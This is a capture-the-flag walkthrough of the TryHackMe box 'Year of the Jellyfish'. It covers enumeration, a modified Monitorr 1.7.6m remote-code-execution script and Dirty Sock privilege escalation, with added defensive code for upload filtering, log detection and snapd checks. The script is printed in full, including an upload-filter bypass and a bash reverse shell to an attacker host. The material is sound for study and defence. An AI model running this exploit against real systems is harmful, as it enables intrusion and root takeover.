Year of the Jellyfish

30/04/2021 | Difficulty: Hard

SYNOPSIS

Year of the Jellyfish is a hard box based on a real-world challenge, and it gives good practice for OSCP preparation. Enumeration helps us find subdomains, the Monitorr 1.7.6m RCE exploit gives us a foothold on the box, and privilege escalation with the Dirty Sock version-2 exploit gets us root. Also worth mentioning: this box runs on a public IP and is also connected to the TryHackMe network.

ENUMERATION

Starting with Nmap: scan every port first, then run a second command to learn more about the services running on the ports that turn out to be open.

nmap -p- -vv <MACHINE-IP> 

After getting this output, run the following command to learn more about the services on all the ports found above.

nmap -sC -sV -p 21,22,80,443,554,1723,8000,8096,22222 <MACHINE-IP>

The output is very long, so instead of pasting a screenshot, here are the key points:

  • FTP is running on port 21, but there isn't enough information to get in.

  • SSH is running on two ports: 22 and 22222.

  • Web servers are running on four ports: 80, 443, 8000 and 8096.

  • Looking closer at the port 443 output shows the following subdomains:

    • monitorr.robyns-petshop.thm

    • beta.robyns-petshop.thm

    • dev.robyns-petshop.thm

Now that we have an overview of what's happening on the network, let's go deeper and start enumerating the web servers. Before that, add the IP together with the domain and the subdomains to the /etc/hosts file. To learn why this is needed, check out this article.

Now starting with root domain enumeration, robyns-petshop.thm: you'll notice that the browser asks you to accept the self-signed certificate, and after doing so you will see the front page below.

There is nothing special on it, so I started ffuf with the following command to brute-force directories and got the following results:

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u https://robyns-petshop.thm/FUZZ

Went through each and every one of them and found nothing special. Moving on to what the subdomains have to offer: beta.robyns-petshop.thm and dev.robyns-petshop.thm both showed the same "Under Construction" page.

The ID_HERE placeholder looked fishy, so I made a wordlist of numbers with Crunch, using the following command, to brute-force it.

crunch 4 4 -t %%%% -o numb

This made a wordlist of numbers from 0000 to 9999. But again no luck with any information; I tried this on both subdomains, dev and beta.

Before moving to the last subdomain: there was another service running on port 8096 of the root domain, Jellyfin, as you can see in the image below. It had a login portal, so I fired up Hydra and started brute-forcing the credentials, but no luck with that either.

Now we are left with our last subdomain, monitorr.robyns-petshop.thm, and this looked interesting: it is open source (it has a GitHub repo), version 1.7.6 was mentioned at the bottom of the page, and it had a login portal too. For the login portal, admin is the default username, so again I used Hydra to brute-force with the admin username, but no luck.

Used Searchsploit to check whether any exploit is available for this Monitorr version, and got the following results:

INITIAL FOOTHOLD

Looking into the first exploit, Authorization Bypass: it "allows creation of administrative accounts by abusing the installation URL". This exploit basically makes a POST request to the path /assets/config/installation/_register.php?action=register to create a new user. Adding this path to the monitorr domain gives a 404 Not Found, hence this exploit won't work!

Moving on to the second exploit, Remote Code Execution (Unauthenticated): I tried the exploit directly and it gave error after error; the main thing it showed was that certificate verification failed. Searching the internet, I learned that adding verify=False to the requests call makes it skip the certificate check and carry on with the rest of the code.

Tried the exploit again; it still didn't work. Looking at the code, requests.post sends the POST request to the server, so to check the response I printed it out:

print(requests.post(url, headers=headers, data=data, verify=False).text)

Running the exploit again gives the following error:

After a while I found, via the browser's developer tools, a cookie named isHuman with the value 1. After adding the cookie to the code and running the script, the same error appeared again, so maybe there is a filter on uploaded file names. I then played with file names, using the HackTricks article on file uploads, and finally got a file upload bypass: shell.jpeg.Php

And here's how the code looks after making all the changes to the original exploit:

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys


if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    # Upload endpoint; the request body below is a hand-built multipart/form-data form.
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0","Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    # The filename carries the double extension that got past the upload filter,
    # and the body starts with a GIF header so the file looks like an image.
    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"shell.jpeg.Php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    # verify=False skips the self-signed certificate check; isHuman is the cookie
    # the site sets in the browser. Print the response to see what the server says.
    print(requests.post(url, headers=headers, data=data,verify=False,cookies={"isHuman":"1"}).text)

    print ("A shell script should be uploaded. Now we try to execute it")
    # Request the uploaded file from the upload directory so the server runs it.
    url = sys.argv[1] + "/assets/data/usrimg/shell.jpeg.Php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers,verify=False,cookies={"isHuman":"1"})
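From the defender's side, the bypass above works because the upload filter looks only at one extension, case-sensitively, and trusts the client's file name. The following is an added example (not Monitorr's code and not part of the original walkthrough) that puts a constructed weak filter, an assumption about what the bypassed check looked like, next to a hardened validator: every dotted segment is checked case-insensitively against script extensions, the final extension must be an image type, the leading bytes must match that type, and accepted files are stored under a server-generated name. The extension list and magic-byte table are constructed for the example.

```python
import os
import secrets

# Extensions a PHP-enabled server may execute wherever they appear in the name.
# (Constructed for this example; tune it to the real server configuration.)
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each accepted image type.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def naive_is_allowed(filename: str) -> bool:
    """Constructed stand-in for a weak filter (an assumption, not Monitorr's code):
    a case-sensitive check on the last extension only, so 'shell.jpeg.Php' passes."""
    return not filename.endswith(".php")


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Accept only plain image files:
    - every dotted segment after the base name is compared, lower-cased,
      against the executable-extension list (catches .jpeg.Php and .php.png);
    - the last segment must be an allowed image extension;
    - the body must begin with the magic bytes of that same image type,
      so a GIF header arriving under a '.jpeg' name is refused."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False  # no extension, leading dot (.htaccess) or empty segment
    extensions = parts[1:]
    if any(ext in EXECUTABLE_EXTENSIONS for ext in extensions):
        return False
    final_ext = extensions[-1]
    if final_ext not in ALLOWED_IMAGE_EXTENSIONS:
        return False
    for magic, kind in MAGIC.items():
        if content.startswith(magic):
            if kind == "jpeg":
                return final_ext in {"jpg", "jpeg"}
            return kind == final_ext
    return False


def storage_name(filename: str, content: bytes):
    """Name to store an accepted upload under: server-generated, never the
    client's own filename, with a single known-good extension. None if rejected."""
    if not hardened_is_allowed(filename, content):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    sample = b"GIF89a213213123<?php echo 1; ?>"  # constructed GIF-with-PHP body
    print("naive filter accepts shell.jpeg.Php:", naive_is_allowed("shell.jpeg.Php"))
    print("hardened filter accepts it:", hardened_is_allowed("shell.jpeg.Php", sample))
```

Note that a magic-byte check on its own does not stop a polyglot (a real GIF header followed by PHP code under a legitimate .gif name still passes it); what actually removes the risk is the combination of the extension rule, the server-chosen storage name, and serving the upload directory from a location where the web server does not execute scripts.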

Before running the script, start the nc listener on port 443 with sudo. Why port 443? Because there might be a firewall blocking other ports; I also tried other ports and they didn't work. And ports below 1024 need sudo.

The first thing to do after getting the reverse shell is to stabilize it, using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# now press Ctrl+Z to background the shell, then run:
stty raw -echo;fg

The first flag is in the /var/www directory, in a file named flag1.txt.
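The foothold leaves a clear trace in the web server's access log: a POST to the upload endpoint followed by a GET for a script-like name under the upload directory. Below is an added detection example, not part of the original walkthrough, that runs over a few constructed Apache combined-format log lines (the IPs, timestamps and sizes are made up; the two paths are the ones the exploit above uses) and flags any request for a file with an executable extension in the upload directory, noting whether the same client uploaded something earlier in the log.

```python
import re

# Constructed access-log lines in Apache "combined" format; not taken from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Apr/2021:12:00:01 +0000] "POST /assets/php/upload.php HTTP/1.1" 200 43 "https://monitorr.robyns-petshop.thm" "Mozilla/5.0"
10.0.0.5 - - [30/Apr/2021:12:00:02 +0000] "GET /assets/data/usrimg/shell.jpeg.Php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [30/Apr/2021:12:01:00 +0000] "GET /assets/data/usrimg/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [30/Apr/2021:12:01:05 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

UPLOAD_ENDPOINT = "/assets/php/upload.php"  # the endpoint the exploit posts to
UPLOAD_DIR = "/assets/data/usrimg/"          # where uploads are served from
# A script extension anywhere after the first dot: ".php", ".Php", ".php.png", ".phtml"
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(?=\.|$)", re.IGNORECASE)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_abuse(log_text: str):
    """Flag requests for script-like names in the upload directory and note
    whether the same client POSTed to the upload endpoint earlier in the log."""
    posted = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            posted.add(rec["ip"])
        elif path.startswith(UPLOAD_DIR) and EXEC_EXT_RE.search(path):
            alerts.append({
                "ts": rec["ts"],
                "ip": rec["ip"],
                "path": path,
                "status": int(rec["status"]),
                "uploaded_earlier": rec["ip"] in posted,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_abuse(SAMPLE_LOG):
        print(alert)
```

A 200 response on the flagged GET is the important signal: it means the server handed the file to the PHP interpreter rather than refusing it. The cleaner fix is to serve the upload directory with script execution disabled, at which point the same rule still catches the attempt but the request can no longer succeed.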

PRIVILEGE ESCALATION

For privilege escalation, I started linpeas.sh but it really didn't show any good results; then I used Linux Exploit Suggester, and it showed the following results:

Looking at the snap version, it looks vulnerable to Dirty Sock. Let's download the zip to the local machine and wget it over to the compromised machine!

It comes in two versions. The first one gave an error, so I tried the second one, and here's what I got: it created a user dirty_sock which has root permissions! Then I switched user to dirty_sock with the password dirty_sock.

Then sudo su with the password dirty_sock, and we're root! <3
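Two things a defender would check after reading this escalation path: whether the installed snapd is older than the release that fixed Dirty Sock (snapd 2.37.1; that fix version is a fact about the bug, not something from the walkthrough), and whether an unexpected account has been added to the sudo group, which is exactly the artefact the exploit leaves behind. The following is an added example, not part of the original post, working over a constructed snap version listing and a constructed /etc/group excerpt; on a real host you would feed it the output of `snap version` and the contents of /etc/group.

```python
import re

# Constructed sample of `snap version` output (not from the box); the real
# command prints the same key/value layout.
SAMPLE_SNAP_VERSION = """\
snap    2.37
snapd   2.37
series  16
ubuntu  18.04
kernel  4.15.0-20-generic
"""

# Constructed /etc/group excerpt with an account appended to the sudo group.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:robyn,dirty_sock
www-data:x:33:
"""

# snapd release that fixed Dirty Sock; releases before this are affected.
DIRTY_SOCK_FIXED = (2, 37, 1)


def parse_version(text: str):
    """'2.37.1+18.04' -> (2, 37, 1); None if no numeric version is found."""
    m = re.match(r"(\d+(?:\.\d+)*)", text.strip())
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def snapd_version(snap_version_output: str):
    """Pick the snapd line out of `snap version` output and parse it."""
    for line in snap_version_output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "snapd":
            return parse_version(parts[1])
    return None


def snapd_vulnerable(snap_version_output: str) -> bool:
    """True when snapd is present and older than the fixed release."""
    v = snapd_version(snap_version_output)
    if v is None:
        return False  # snapd absent or unparsable: nothing to report here
    v = v + (0,) * (len(DIRTY_SOCK_FIXED) - len(v))  # (2, 37) compares as (2, 37, 0)
    return v < DIRTY_SOCK_FIXED


def unexpected_sudoers(group_file: str, expected: set):
    """Members of the sudo group that are not on the expected list."""
    for line in group_file.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "sudo":
            members = {m for m in fields[3].split(",") if m}
            return sorted(members - expected)
    return []


if __name__ == "__main__":
    print("snapd vulnerable:", snapd_vulnerable(SAMPLE_SNAP_VERSION))
    print("unexpected sudo members:", unexpected_sudoers(SAMPLE_GROUP_FILE, {"robyn"}))
```

The version check is the preventive control (patch snapd), the group check is the detective one; the second is worth running from a file-integrity or configuration-management tool rather than by hand, since a new sudo-group member is a high-signal change on any host.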

Thank you for reading the walkthrough, I hope it helped you somehow! :)

If you have any queries, contact me on Twitter or on Discord: Th3lazykid#8871.
